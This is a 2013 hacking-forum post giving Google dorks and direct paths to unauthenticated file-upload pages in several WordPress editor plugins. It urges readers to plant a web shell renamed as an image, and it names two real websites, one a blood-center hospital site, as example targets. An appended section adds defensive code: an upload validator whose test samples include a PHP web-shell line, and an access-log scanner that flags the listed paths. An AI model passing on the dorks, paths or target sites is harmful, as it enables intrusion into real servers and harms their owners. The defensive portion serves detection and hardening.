Iraqe Hacker
01-25-2013, 08:16 PM
My dear friends and esteemed members,
Upload vulnerabilities: you upload a shell with an image extension,
and you can switch the extension with a Firefox add-on,
you surely know it, Live HTTP Headers.
Where the shell lands is up to you to find, since honestly I did not look for it.
Dork:
inurl:wp-content/plugins/monsters-editor-10-for-wp-super-edit
Exploit:
wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html
Example site:
http://kybloodcenter.org/hospital/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html
And this one too:
http://celiaflores.net/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html
============================================
Dork:
inurl:/js/tiny_mce/plugins/tinybrowser/upload.php
Exploit:
admin/js/tiny_mce/plugins/tinybrowser/upload.php
Shell path:
uploads/imagens/
============================================
Dork:
inurl:"wp-content/plugins/chenpress"
Exploit:
wp-content/plugins/chenpress/FCKeditor/editor/filemanager/browser/mcpuk/browser.html
============================================
Dork:
intext:"Web Development by IES, Inc"
Exploit:
/fckeditor/editor/filemanager/browser/default/browser.html
============================================
Dork:
inurl:"wp-content/plugins/wp-insert"
Exploit:
/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/browser.html
And sometimes there is a "blog" folder before the exploit path:
/blog/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/browser.html
============================================
Dork:
inurl:plugins/flexiweb-form/
Exploit:
/wp-content/plugins/flexiweb-form/ajax/upload_img.php
============================================
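Why the "shell with an image extension" trick in the post works, and what an upload handler should do instead, as an added example (this is not code from the post, nor from any of the plugins it names). Both validators are hypothetical stand-ins: `naive_accepts` models a handler that trusts the client-supplied Content-Type, which is exactly the header a Firefox add-on such as Live HTTP Headers lets the attacker rewrite; `hardened_accepts` ignores that header, checks the last extension against an allow-list, verifies the file's magic bytes, and replaces the user's filename with a random one. The sample uploads are constructed inline.

```python
"""Naive vs hardened image-upload validation (added example, hypothetical code)."""
import os
import secrets

# Magic-byte prefixes for the only image types we are willing to accept.
IMAGE_MAGIC = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
}
ALLOWED_EXT = set(IMAGE_MAGIC)


def naive_accepts(filename: str, content_type: str) -> bool:
    """The weak check: trusts the Content-Type the browser sent.

    Both the filename and the Content-Type come from the multipart body,
    so anyone editing the request can send shell.php as image/gif.
    """
    return content_type.startswith("image/")


def sniff_image_type(data: bytes):
    """Return the image type implied by the leading bytes, or None."""
    for ext, prefixes in IMAGE_MAGIC.items():
        if any(data.startswith(p) for p in prefixes):
            return ext
    return None


def hardened_accepts(filename: str, content_type: str, data: bytes):
    """Return a safe storage name if the upload is acceptable, else None.

    - Content-Type is ignored entirely (attacker controlled).
    - Only the LAST extension is considered, so shell.php.gif is judged
      as .gif and shell.gif.php is rejected outright.
    - The content's magic bytes must match that extension.
    - The user's name is discarded; the stored name is random and its
      extension is the sniffed type. A GIF that also carries PHP text
      (polyglot) is therefore stored as <random>.gif, which is inert
      as long as the upload directory is served without script execution.
    """
    del content_type  # deliberately unused
    ext = os.path.splitext(filename)[1].lower().lstrip(".")
    if ext == "jpeg":
        ext = "jpg"
    if ext not in ALLOWED_EXT:
        return None
    sniffed = sniff_image_type(data)
    if sniffed != ext:
        return None
    return f"{secrets.token_hex(16)}.{sniffed}"


# Constructed sample uploads: (filename, Content-Type, body). Not real files.
SAMPLES = {
    "real_gif":     ("photo.gif",     "image/gif", b"GIF89a" + b"\x00" * 16),
    "renamed_php":  ("shell.php",     "image/gif", b"<?php system($_GET['c']); ?>"),
    "double_ext":   ("shell.php.gif", "image/gif", b"<?php echo 1; ?>"),
    "gif_then_php": ("shell.gif.php", "image/gif", b"GIF89a<?php echo 1; ?>"),
    "polyglot":     ("pic.gif",       "image/gif", b"GIF89a<?php echo 1; ?>"),
}


def evaluate(samples=SAMPLES):
    """Run both validators; return {name: (naive_ok, hardened_name_or_None)}."""
    return {
        name: (naive_accepts(fn, ct), hardened_accepts(fn, ct, data))
        for name, (fn, ct, data) in samples.items()
    }


if __name__ == "__main__":
    for name, (naive, hard) in evaluate().items():
        verdict = f"accepted as {hard}" if hard else "rejected"
        print(f"{name:13s} naive={naive!s:5s} hardened={verdict}")
```

The naive check accepts every sample, including the renamed shell; the hardened one accepts only the genuine GIF and the polyglot, and the polyglot is stored under a random `.gif` name, so it never reaches the PHP interpreter. The remaining defence is outside the validator: serve the upload directory with script execution disabled.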
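For the defending side, the exploit paths the post lists double as detection indicators. Below is an added example, not from the post, that parses access-log lines in the common/combined format and flags requests whose path contains one of those editor/upload components; it lower-cases, percent-decodes and collapses slashes first so the mixed-case `FCKeditor` and `/blog/` prefix variants the post mentions still match. The log lines are constructed for the example (198.51.100.0/24 is documentation address space), not captured from any site.

```python
"""Flag access-log requests for the file-manager endpoints listed in the post (added example)."""
import re
from urllib.parse import unquote

# Path fragments taken from the exploit paths in the post, lower-cased.
# Matching a fragment rather than a full path catches the /blog/ prefix
# variant and any other install root.
INDICATORS = (
    "fckeditor/editor/filemanager/upload/",
    "fckeditor/editor/filemanager/browser/",
    "tiny_mce/plugins/tinybrowser/upload.php",
    "wp-content/plugins/flexiweb-form/ajax/upload_img.php",
)

# Apache/nginx common and combined log formats share this prefix.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line):
    """Return a dict of fields, or None if the line is not a request record."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    return entry


def normalize_path(path):
    """Drop the query string, percent-decode, lower-case, collapse '//'."""
    path = unquote(path.split("?", 1)[0]).lower()
    return re.sub(r"/{2,}", "/", path)


def classify(entry):
    """Return the matched indicator, or None for ordinary traffic."""
    path = normalize_path(entry["path"])
    for indicator in INDICATORS:
        if indicator in path:
            return indicator
    return None


def scan(lines):
    """Return [(ip, method, status, indicator)] for every flagged request."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        indicator = classify(entry)
        if indicator:
            hits.append((entry["ip"], entry["method"], entry["status"], indicator))
    return hits


# Constructed sample log (not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [25/Jan/2013:20:16:01 +0300] "GET /wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html HTTP/1.1" 200 4123 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [25/Jan/2013:20:16:30 +0300] "GET /wp-content/plugins/chenpress/FCKeditor/editor/filemanager/browser/mcpuk/browser.html HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [25/Jan/2013:20:17:30 +0300] "GET /blog/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/browser%2Ehtml HTTP/1.1" 404 233 "-" "curl/7.26"',
    '198.51.100.12 - - [25/Jan/2013:20:18:02 +0300] "GET /admin/js/tiny_mce/plugins/tinybrowser/upload.php HTTP/1.1" 200 1820 "-" "Mozilla/5.0"',
    '198.51.100.3 - - [25/Jan/2013:20:18:40 +0300] "GET /wp-content/uploads/2013/01/banner.gif HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
    '198.51.100.3 - - [25/Jan/2013:20:18:41 +0300] "GET /index.php HTTP/1.1" 200 7300 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for ip, method, status, indicator in scan(SAMPLE_LOG):
        print(f"{ip:14s} {method:4s} {status}  matched {indicator}")
```

A 200 on one of these paths means the editor's file manager is reachable, whether or not an upload followed; a 404 still records who is probing. The fix on the server side is to remove or upgrade the plugin that ships the bundled file manager, not to block a single path.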